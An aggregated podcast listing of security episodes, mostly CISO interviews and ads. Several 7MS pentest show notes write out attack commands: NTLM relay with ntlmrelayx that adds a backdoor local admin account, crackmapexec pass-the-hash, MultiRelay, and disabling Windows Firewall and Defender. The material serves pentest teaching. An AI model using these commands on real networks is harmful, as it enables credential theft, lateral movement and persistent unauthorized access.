Todd Bell is the Chief Security & Trust Officer for Verdigris Holdings, a 100% cloud Banking as a Service (BaaS) located in Scottsdale, AZ. Todd brings more than 15+ years of information security & technology experience working at Fortune 500 global corporations to Start-up ventures. Bell is a recognized industry veteran that serves as a Subject Matter Expert (SME) for various analyst firms needing industry insights and market trends. Bell has made numerous contributions to the technology and cyber industry as CISOonline.com contributing writer and written white papers for EC Council and various organizations.Prior to Verdigris Holdings, Todd served as VP of Enterprise Architecture & CISO for Intersec Worldwide, advising corporations how to build, sustain, and operationalize cybersecurity programs at scale. Before joining Intersec Worldwide, Todd was a Customer Chief Information Security Officer for a major franchise while at Fishnet Security and worked at Verizon Business that was formerly Cybertrust.Bell holds an M.B.A. from Regis University in Denver, CO and bachelor's degree in Business Information Systems. Bell holds a variety of professional certifications consisting of Corporate Governance (SOX) from Tulane University Law School, PMP credential from Project Management Institute, Information Security (CISSP), and a certified Master Project Manager from Regis.Register for Global CISO Forum: https://globalcisoforum2020.eventbrite.com/?aff=ToddBell Register for Hacker Halted: https://hackerhalted2020.eventbrite.com

7MS #392: LAPS Reloaded

cisco reloaded vmware laps deep freeze comptia itprotv ec council

Play Episode Listen Later Dec 19, 2019 24:35

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today's episode is all about LAPS - Microsoft's Local Administrator Password solution. In a nutshell, LAPS strengthens and randomizes the local administrator password on the systems across your enterprise. We talked about it way back in episode 252 but figured it was worth a revisit because: It's awesome It's free People still haven't heard of it when I share info about it during conference talks! I've got a full write-up of how to install LAPS here At a recent conference people asked me two awesome edge case questions: What if I aggressively delete inactive machines from my AD - does the LAPS attribute go with it? What do I do if I use Deep Freeze and the LAPS password attribute in AD keeps getting out of sync with the actual password on systems because of Deep Freeze's freeze/thaw times?

7MS #391: Securing Your Family During and After a Disaster - Part 3

family disasters cisco securing vmware spoliers comptia itprotv ec council

Play Episode Listen Later Dec 11, 2019 49:34

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. This is part three of this series - part 1 talked about a fire that destroyed my family's home and vehicles, and part 2 was about how to get "back on the grid" and start working with the insurance machine to find a new "normal." Today, I want to answer some burning questions many of you have been asking: Have you hit rock bottom yet? (Spolier alert: no, but I tell you about a moment I almost lost my mind after dropping a shoe in a storm drain) How long to you get to keep rental cars before you have to replace your permanent vehicles? Do you have to stay in a hotel the whole time your house is rebuilt? What about if you get placed in temporary housing - do you have to rebuy your beds/furniture/clothes/etc. and keep them at your temp place, then move them again once your house is rebuilt? What adjustments might you want to make to your insurance policies to make sure you have the right amount of coverage in case of emergency?

7MS #390: Tales of Internal Network Pentest Pwnage - Part 11

Play Episode Listen Later Dec 6, 2019 62:52

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today's episode is a twofer. That's right, two tales of internal network pentest pwnage. Whoop whoop! We cover: What the SDAD (Single Domain Admin Dance) and DDAD (Double Domain Admin Dance) are (spoiler: imagine your dad trying to dance cool...it's like that, but more awkward) A good way to quickly find domain controllers in your environment: nslookup -type=SRV _ldap._tcp.dc._msdcs.YOURDOMAIN.SUFFIX This handy script runs nmap against subnets, then Eyewitness, then emails the results to you Early in the engagement I'd highly recommend checking for Kerberoastable accounts I really like Multirelay to help me pass hashes, like: MultiRelay.py -t 1.2.3.4 -u bob.admin Administrator yourmoms.admin Once you get a shell, run dump to dump hashes! Then, use CME to pass that hash around the network! crackmapexec smb 192.168.0.0/24 -u Administrator -H YOUR-HASH-GOES-HERE --local auth Then, check out this article to use NPS and get a full-featured shell on your targets

network tales internal cisco administrators whoop vmware nps eyewitness cme comptia srv pentest itprotv ec council

Global CISO Forum Podcast: Interview with Roota Almeida, Chief Information Security Officer at Delta Dental

Play Episode Listen Later Dec 2, 2019 38:39

On this episode of Global CISO Forum, we sit down with Roota Almeida, Chief Information Security Officer at Delta Dental. A dynamic senior IT executive and CISO responsible for successful implementation of information security, risk and compliance systems and strategies across multiple industries with global operations. With more than 15 years of direct experience in[...]The post Global CISO Forum Podcast: Interview with Roota Almeida, Chief Information Security Officer at Delta Dental appeared first on EC-Council.

forum almeida ciso chief information security officer delta dental global ciso ec council roota

7MS #385: A Peek into the 7MS Mail Bag

Play Episode Listen Later Oct 22, 2019 44:35

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today I'm joined by a very special guest: Mrs. 7MS! She joins me on a road trip to northern MN, reads me some questions from the 7MS mail bag, and we tackle them together (with a side order of commentary on weddings, overheating iPads, cheap hotels and the realization that this is likely the first - and only episode that Mrs. 7MS has ever listened to). Links to things discussed this episode: Wireless pentest certs: SEC617 - SANS course that covers wifi pentesting (with WPA enterprise attacks) Offensive Security Wireless Professional Good/free pentest training options: Pentester Academy VulnHub Rastalabs The Cyber Mentor Free logging/alerting solutions for SMBs: WEFFLES Logging Made Easy HELK Wazuh

mail ipads mn cisco peek wireless vmware wpa comptia itprotv ec council

Global CISO Forum Podcast: Interview with Rob Johnston

forum podcast on global ciso listen download rob johnston ec council

Play Episode Listen Later Oct 7, 2019 17:38

In this Podcast: On this episode, Amber Pedroncelli interviews Rob Johnston. Listen Download this PodcastThe post Global CISO Forum Podcast: Interview with Rob Johnston appeared first on EC-Council.

Global CISO Forum Podcast: Michael F D Anaya, Head of Global Cyber Investigations at DEVCON

Play Episode Listen Later Oct 2, 2019 31:55

In this Podcast: On this episode, Amber Pedroncelli interviews Michael F D Anaya, Head of Global Cyber Investigations at DEVCON. Listen Download this PodcastThe post Global CISO Forum Podcast: Michael F D Anaya, Head of Global Cyber Investigations at DEVCON appeared first on EC-Council.

head forum podcast michael michael f devcon podcast on global ciso listen download ec council cyber investigations

7MS #382: Tales of Internal Network Pentest Pwnage - Part 9

Play Episode Listen Later Sep 24, 2019 34:22

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today's episode is about a pentest that was pretty unique for me. I got to ride shotgun and kind of be in the shadows while helping another team pwn a network. This was an especially interesting one because the client had a lot of great security defenses in place, including: Strong user passwords A SIEM solution that appeared to be doing a great job We did some looking for pwnage opportunities such as: Systems missing EternalBlue patch Systems missing BlueKeep patch What got us a foot in the door was the lack of SMB signing. Check this gist to see how you can use RunFinger.py to find hosts without SMB signing, then use Impacket and Responder to listen for - and pass - high-priv hashes. Side note: I'm working on getting a practical pentesting gist together in the vein of Penetration Testing: A Hands-On Introduction to Hacking and Hacker Playbook.

network tales internal hacking cisco responders vmware smb siem comptia eternalblue pentest bluekeep itprotv ec council

7MS #380: Tales of Internal Network Pentest Pwnage - Part 8

Paul's Security Weekly TV

Play Episode Listen Later Sep 4, 2019 28:35

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today's episode is a continuation of episode #379, where we: Conducted general nmap scans (and additional scans specifically looking for Eternal Blue) Sucked our nmap scans into Eyewitness Captured and cracked some creds with Paperspace Scraped the company's marketing Web site with brutescrape and popped a domain admin account (or so I thought!) Today, the adventure continues with: Checking the environment for CVE-2019-1040 Picking apart the privileges on my "pseudo domain admin" account Making a startling discovery about how almost all corp passwords were stored Enjoy!

network tales web picking checking internal cisco vmware conducted cve comptia pentest itprotv ec council

Jessica Johnson & Amber Pedroncelli, Hacker Halted - BSW #140

Play Episode Listen Later Aug 21, 2019 22:32

Hacker Halted is EC-Council's premier IT Security Conference held in Atlanta annually. Hacker Halted gathers 1400+ Information Security Professionals in two days of Exhibiting, Breakout Sessions, Live Hacking Demos and Keynotes! Full Show Notes: https://wiki.securityweekly.com/BSWEpisode140 To register for Hacker Halted, visit: https://securityweekly.com/hackerhalted and use the discount code HH19SW to get $100 off! Visit https://www.securityweekly.com/bsw for all the latest episodes!

hackers hacking breakout demos keynotes halted exhibiting breakout sessions jessica johnson ec council pedroncelli

Jessica Johnson & Amber Pedroncelli, Hacker Halted - Jessica Johnson, Amber Pedroncelli - BSW #140

Business Security Weekly (Video)

Play Episode Listen Later Aug 21, 2019 22:32

Hacker Halted is EC-Council's premier IT Security Conference held in Atlanta annually. Hacker Halted gathers 1400+ Information Security Professionals in two days of Exhibiting, Breakout Sessions, Live Hacking Demos and Keynotes! Full Show Notes: https://wiki.securityweekly.com/BSWEpisode140 To register for Hacker Halted, visit: https://securityweekly.com/hackerhalted and use the discount code HH19SW to get $100 off! Visit https://www.securityweekly.com/bsw for all the latest episodes!

careers hackers keynotes halted exhibiting breakout sessions jessica johnson ec council pedroncelli

7MS #377: DIY Pentest Dropbox Tips

Play Episode Listen Later Aug 16, 2019 28:40

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. In today's episode I cover some of the nasty "gotchas" I've run into when sending my pentest dropboxes around the country. Curious on how to setup your own portable pentest dropboxes (and/or pentest lab environments)? Check out part 1 and part 2 of the DIY Pentest Lab video series. Here are some of the pain points I cover today: Turn the firewall off Set Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Domain Profile > Windows Firewall: Protect all network connections to Disabled. Do the same for the Standard Profile by changing Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Standard Profile > Windows Firewall: Protect all network connections to Disabled. Disable Windows Defender Navigate to Computer Configuration > Administrative Templates > Windows Components > Windows Defender and choose Turn Off Windows Defender. Disable power sleep settings To stop computers from snoozing on the job, head to Computer Configuration > Policies > Administrative Templates > System > Power Management > Sleep Settings and set Allow standby states (S1-S3) when sleeping (plugged in) to Disabled Create a second disk on the Windows management VM and install BitLocker to Go Check out today's show notes at 7ms.us for more info!

curious windows cisco disabled dropbox vm vmware disable go check comptia bitlocker pentest itprotv ec council

7MS #376: Tales of SQL Injection Pwnage

Play Episode Listen Later Aug 11, 2019 38:28

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. We cover a lot of ground today on a variety of topics: I have an Oculus Quest now and I love it. My handle is turdsquirt if you ever wanna shoot some zombies together. I share a story that yes, does involve poop - but only the mention of it. It's nothing like the epic tale (tail?) of my parents' dog pooping in my son's dresser drawers. I had a really fun pentest recently where I found some good old school SQL injection. I took to Slack to share and since then, several of you have reached out to ask how I found the vulnerability. Here are some steps/tips I talk about on today's episode that will help: Watch Sunny's Burp courses on Pluralsight to enhance your Burp abilities Install CO2 from the BApp store When doing a Web app pentest, feed various fields SQL injection payloads, such as the ones in PayloadsAlltheThings Grab a copy of sqlmap Use sites like this one to help tune your sqlmap commands to find vulnerabilities. In the end, my command I used to dump contents of important tables was this: (See today's show notes on the 7MS Web site for more information!)

tales web slack cisco vmware sql oculus quest burp pluralsight comptia sql injection itprotv ec council bapp

7MS #372: Tales of Internal Pentest Pwnage - Part 5

Play Episode Listen Later Jul 15, 2019 43:57

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode: Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this: opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt grep "Signing:'False'" hosts.txt | grep -o '[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}' > targets.txt Source: Pwning internal networks automagically Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget: net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add So the full command would be: ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add' Check today's show notes at https://7ms.us for more information!

open tales internal cisco administrators attacking responders ips vmware smb comptia pentest itprotv subnet ec council

7MS #371: Tales of Internal Pentest Pwnage - Part 4

tales 4th of july internal cisco vmware comptia pentest itprotv ec council

Play Episode Listen Later Jul 12, 2019 44:38

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute Happy belated 4th of July! Today I've got another fun tale of internal pentest pwnage that comes out of a few recent assessments I did. These tests were really fun because the clients had good defensive measures in place, such as: Having separate accounts for day-to-day operations and administrative/privileged tasks Local Administrator account largely disabled across the enterprise Lean membership in privileged groups (Domain Admins, Enterprise Admins, Schema Admins, etc.) Hard-to-crack passwords! Will I succeed in getting a solid foothold on this network and (hopefully) escalate to Domain Admin? Check out today's episode to find out!

Global CISO Forum Podcast: Everyone Needs Cyber Security

cybersecurity forum everyone needs podcast on podcast everyone global ciso paul horn listen download ec council

Play Episode Listen Later Jun 14, 2019 14:06

In this Podcast: On this episode, Amber Pedroncelli interviews Paul Horn to discuss why everyone needs cybersecurity. Listen Download this PodcastThe post Global CISO Forum Podcast: Everyone Needs Cyber Security appeared first on EC-Council.

Global CISO Forum Podcast with ALTR CEO Dave Sikora

forum sikora podcast on global ciso listen download altr ec council

Play Episode Listen Later Mar 20, 2019 33:43

In this Podcast: On this episode, Amber Pedroncelli interviews ALTR CEO Dave Sikora to talk blockchain and security, Dave's career path, and the future of blockchain. Listen Download this PodcastThe post Global CISO Forum Podcast with ALTR CEO Dave Sikora appeared first on EC-Council.

10: Philip Blake

People of Tech

Play Episode Listen Later Feb 4, 2019 42:27

On this episode of People of Tech, Charles is joined by [Philip Blake](https://www.linkedin.com/in/philipblakecyber/), the Country Manager (UK and EU) of [EC-Council](https://www.eccouncil.org), the world's largest certification body for Ethical Hacking and Advanced Information Security Training. Philip has been working at EC-Council since 2016. His employers are the suppliers of cybersecurity training including leadership training courses for IT professionals. In the podcast, Philip discusses his career to date, explains more about what EC-Council provide to their customers and gives his opinion on the current threat landscape in regards to how we can protect ourselves and our organisations.

tech european union ethical hacking ec council

Global CISO Forum Podcast with Thomas Vaughn

mba forum vaughn global ciso listen download ec council

Play Episode Listen Later Nov 29, 2018 20:17

In this Podcast: Host Amber Pedroncelli sits down with Thomas Vaughn to discuss Florida elections, the military to private transition, how to think about missing the technical side of security and getting your MBA. Listen Download this PodcastThe post Global CISO Forum Podcast with Thomas Vaughn appeared first on EC-Council.

Global CISO Forum Podcast with Aamir Lakhani

chaos forum lakhani aamir global ciso ec council

Play Episode Listen Later Aug 22, 2018 12:20

In this Podcast: Host Amber Pedroncelli sits down with Aamir Lakhani to discuss this year's Hacker Halted website Aamir Lakhani is a leading security architect and runs the popular security blog Dr. Chaos at www.DrChaos.com. He is responsible to provide IT security solutions to major commercial and federal enterprise organizations. Lakhani has designed offensive counter[...]The post Global CISO Forum Podcast with Aamir Lakhani appeared first on EC-Council.

Global CISO Forum Podcast with Winn Schwartau

Play Episode Listen Later Aug 1, 2018 27:19

In this Podcast: Host Amber Pedroncelli sits down with Winn Schwartau to talk about his role in constructing the agenda for Hacker Halted 2018, the debate he will moderate at the event, and his new book “Analogue Network Security.” Listen Download this PodcastThe post Global CISO Forum Podcast with Winn Schwartau appeared first on EC-Council.

forum global ciso listen download ec council winn schwartau

Global CISO Forum Podcast Awards Series 2018: Zach Mitcham

forum ciso podcast awards podcast welcome mitcham global ciso ec council

Play Episode Listen Later Jul 11, 2018 29:04

In this Podcast: Welcome to the second series of the Global CISO Forum Podcast honoring the EC-Council CISO Awards Finalists! In the coming weeks leading up to the awards, we will be interviewing the best and brightest in infosec who have been named finalists in these categories: CISO of the Year, Certified CISO of the[...]The post Global CISO Forum Podcast Awards Series 2018: Zach Mitcham appeared first on EC-Council.

Heath Renfrow Success Interview

C-Suite Success Radio

Play Episode Listen Later Nov 13, 2017 38:25

On this weeks episode of C-Suite Success Radio, your host and executive coach Sharon Smith interviews Heath Renfrow, Chief Information Security Officer (CISO) for United States Army Medicine and the EC-Council 2017 CISO of the year. Heath shares discusses how relationships are the key to his success and stories about success and the obstacles along the way. You will learn how Heath defines success and the lessons he has learned to help you gain the edge you are looking for. Email heath.renfrow@gmail.com Heath on LinkedIn Learn more about your ad choices. Visit megaphone.fm/adchoices

success ciso chief information security officer ciso ec council

SegInfocast #44 - Desenvolvimento Seguro

Seginfocast - Segurança da Informação - podcast

Play Episode Listen Later Nov 22, 2016 13:05

Nesta nova edição do SegInfocast, o entrevistador convidado Willian Caprino bate um papo pela primeira vez com Davidson Boccardo, Coordenador da Green Hat Labs, profissional com mais de 10 anos de experiência em análise e proteção de software e engenharia reversa para uma conversa sobre Análise de Código e Segurança de Software. Qual a importância da análise de código e segurança de software"? Davidson sinaliza que embora haja treinamento e conscientização em segurança da informação, é muito fácil encontrar softwares desenvolvidos de forma insegura, sem seguir as melhores práticas como as o OWASP. Para cobrir essa lacuna, a Clavis Segurança da Informação lançou o serviço de análise de código e segurança de software com o objetivo de identificar vulnerabilidades em aplicações nas suas diversas fases, desde a arquitetura de segurança do software, análise dos códigos, identificação de vulnerabilidades associadas a falhas de implantação, configuração e operação do software e por ultimo avaliação da aplicação em seu ambiente de operação e a utilização de ferramentas de proteção de software. Qual a relação entre este serviço e o desenvolvimento de aplicações seguras? O serviço visa identificar as vulnerabilidades em um software desenvolvido para fins de compliance ou verificação, já o desenvolvimento seguro exige que os princípios da segurança sejam aplicados desde a concepção do software, com a correta especificação de requisitos de segurança e a correta concepção de uma arquitetura de segurança. Após a concepção do software seguro, é importante que a implementação do código siga as boas práticas de codificação segura, garantindo que falhas típicas de programação não ocorram. Dependendo do contexto da aplicação, além da concepção e codificação segura, é importante avaliar o ambiente na qual a aplicação estará exposta, de modo a protegê-la contra situações atípicas ou adversas, e ao mesmo tempo garantir o correto comportamento da aplicação. Relembre os outros episódios apresentados por Davidson Boccardo: Seginfocast #19 – Análise Forense Computacional SegInfocast #21 – Lançamento do livro Guerra Cibernética SegInfocast #23 – Análise Forense Computacional II SegInfocast #32 – A importância de desenvolver sistemas seguros, do projeto à produção Sobre o entrevistado Davidson Rodrigo Boccardo é Doutor em Engenharia Elétrica pela Faculdade de Engenharia de Ilha Solteira UNESP (2009), com período parcial na University of Louisiana at Lafayette, na qual trabalhou em engenharia reversa de artefatos maliciosos no Software Research Lab do Computer Advanced Center Studies. Entre 2010 e 2015 coordenou o projeto "Segurança de Software em Medidores Inteligentes" no Instituto Nacional de Metrologia, Qualidade e Tecnologia - Inmetro, com a publicação de mais de 50 artigos científicos. É atualmente o Coordenador do Laboratório de Análise de Código e Segurança de Código da Green Hat - Segurança da Informação. Também é instrutor da Clavis - Segurança da Informação na trilha de Forense Computacional, Testes de Invasão e Desenvolvimento Seguro. Possui certificações CHFI (Certified Hacker Forensic Investigator) pela Ec-Council e Secure Programming pela EXIN.

The Steps to Protect Your Accounting Firm From Cyber Attacks

Growing Your Firm | Strategies for Accountants, CPA's, Bookkeepers , and Tax Professionals

Play Episode Listen Later Nov 16, 2016 32:32

Ken Pyle is a partner of DFDR Consulting specializing in Information Security, Computer Forensics, Enterprise Virtualization and Network Engineering. Ken has an extensive background in Network Penetration and Remediation, Compliance and Secure Design. Prior to joining DFDR, he served as a Security and Network Engineer for several Information Technology companies and as the IT Director/Security Engineer of a large accounting firm. Ken has consulted with financial institutions, banks, government defense contractors and other highly secure facilities on issues of Information Security, Computer Forensics and Secure Network Design. Ken has lectured on Information Security and has published several whitepapers on subjects including public information gathering via Social Networking and Social Engineering. Ken was a featured speaker at the 2015 Computer and Enterprise Investigations Conference (CEIC). Ken is a highly rated and popular lecturer on Information Security, presenting for several professional organizations including Wolters Kluwer, Prime Global, RBMA and AGN. Ken is also a subject matter expert for Information Security, appearing in industry publications such as Accounting Today and the New Jersey Law Journal. In 2015, he was recognized as a "40 under 40" by South Jersey Business People. Holding numerous security and technology certifications from industry leaders such as Offensive Security, ISC2, Guidance Software, EC-Council, Cisco, VMware, CompTIA and AccessData, he has also published several software vulnerabilities and exploits, and is an active researcher. He is currently working on a book concentrating on Cybersecurity, Forensics and Secure Design.

SegInfocast #32 - A importância de desenvolver sistemas seguros do projeto à produção

Seginfocast - Segurança da Informação - podcast

Play Episode Listen Later May 2, 2016 12:18

Paulo Sant’anna recebe novamente Davidson Boccardo, instrutor da Academia Clavis Segurança da Informação, para uma conversa sobre Desenvolvimento Seguro. Qual a importância do desenvolvimento seguro desde a concepção dos sistemas? Atualmente, nota-se uma mudança no pensamento por parte das empresas e governos sobre o tema segurança de software. Antes visto como um acréscimo durante o desenvolvimento do software, hoje é visto como uma estratégia para maximizar o retorno sobre o investimento. Neste podcast Davidson evidencia as vulnerabilidades mais exploradas nos dias de hoje e enfatiza a importância do treinamento e conscientização em práticas de codificação segura de software como forma de mitigá-las. Como os conceitos básicos de desenvolvimento seguro podem ser aplicados na vida real? Davidson cita um exemplo de comércio eletrônico, onde graças a adequada implementação de controles de Segurança da Informação, informações pessoais de clientes não são revelados, valores de produtos não são alterados e o site permanece disponível a qualquer hora que o cliente queira acessá-lo, mesmo em períodos de grande quantidade de acessos. Quais as vulnerabilidades mais predominantes no momento? O entrevistado enfatiza a importância da conscientização e treinamento mencionando e explicando cada um dos tópicos abordados no curso Secure Programming Foundation da EXIN. Se você ficou interessado sobre o tema, veja também o Webinar #28 – Exploração de Vulnerabilidades em Softwares InSeguros (Parceria EXIN e Clavis). Para inscrição no curso oficial à distância da EXIN Secure Programming Foundation, com voucher para a prova, acesse o link. Davidson Boccardo é Doutor em Engenharia Elétrica pela faculdade de Engenharia de Ilha Solteiro com período na Universidade de Louisiana e especialista em análise de código malicioso. Atualmente é docente permanente da pós graduação de metrologia e qualidade do Instituto Nacional de Metrologia, Qualidade e Tecnologia. Possui certificado CHFI pela EC-Council e Secure Programming pela EXIN. É instrutor da Clavis Security na trilha de forense computacional e do curso Secure Programming Foundation.

SegInfocast #28 - Exin ISFS ISO 27002 Foundation

Seginfocast - Segurança da Informação - podcast

Play Episode Listen Later Feb 14, 2016 27:16

Paulo Sant’anna recebe Fernando Fonseca, instrutor na Clavis Segurança da Informação, profissional com mais de 30 anos de experiência no mercado de TI, para uma conversa sobre a norma ISO 27002 e a certificação da EXIN ISFS ISO 27002 Foundation. Leia os assuntos abordados nesse podcast: O que é a ISO 27002? Nosso convidado explica a história da norma ISO 27002, quais os objetivos, das 15 categorias de controles que vão desde a segurança física até questões de criptografia, controle de acesso e outras. A EXIN e a certificação ISFS ISO 27002 Foundation Fernando comenta que a EXIN é conhecida no Brasil principalmente pela certificação ITIL. A certificação ISFS Foundation trata dos fundamentos da Segurança da Informação, e é recomendada tanto para profissionais de TI que querem seguir na carreira de Segurança quanto para aqueles que somente querem conhecer os conceitos, como auditores, desenvolvedores, DBA e até mesmo quem não é da área de TI, agregando mais valor as empresas. A ementa do curso São citados alguns pontos que serão abordados no curso como organização de Segurança, ameaças (hacking, engenharia social) e as proteções relacionadas, e muito mais. O curso também é direcionado para as pessoas não-técnicas. Certificações em Segurança da Informação Em 2013, Paulo e Fernando gravaram o SegInfocast #4, que tratava sobre carreira e certificações em Segurança da Informação. As certificações atestam que o profissional tem um conhecimento sobre o assunto e é um ponto favorável na hora de uma seleção de um emprego. A EXIN ISFS é considerada a porta de entrada para a carreira de Segurança da Informação. Curso Oficial EXIN ISFS ISO 27002 Fernando será o instrutor do curso oficial da EXIN ISFS ISO 27002 à distância que será lançado no segundo semestre de 2016 pela Clavis. Todo aluno deste curso receberá um voucher para fazer o exame online, de qualquer lugar através da modalidade “EXIN Anywhere” Livro Também no segundo semestre, será lançado o livro oficial da certificação, homologado pela EXIN que servirá como um livro para estudo próprio. Fernando Fonseca tem mais de 30 anos de experiência em TI. É diretor de ensino da Antebellum Capacitação Profissional e instrutor na Clavis Segurança da Informação. É certificado e habilitado para ministrar cursos oficiais da Microsoft, Exin, EC-Council, ISACA e PCI-DSS.

foundation microsoft brasil nosso iso informa seguran profissional dba certifica itil pci dss isaca clavis ec council exin fernando fonseca

7MS #17: How to Pass the Certified Ethical Hacker Exam (audio)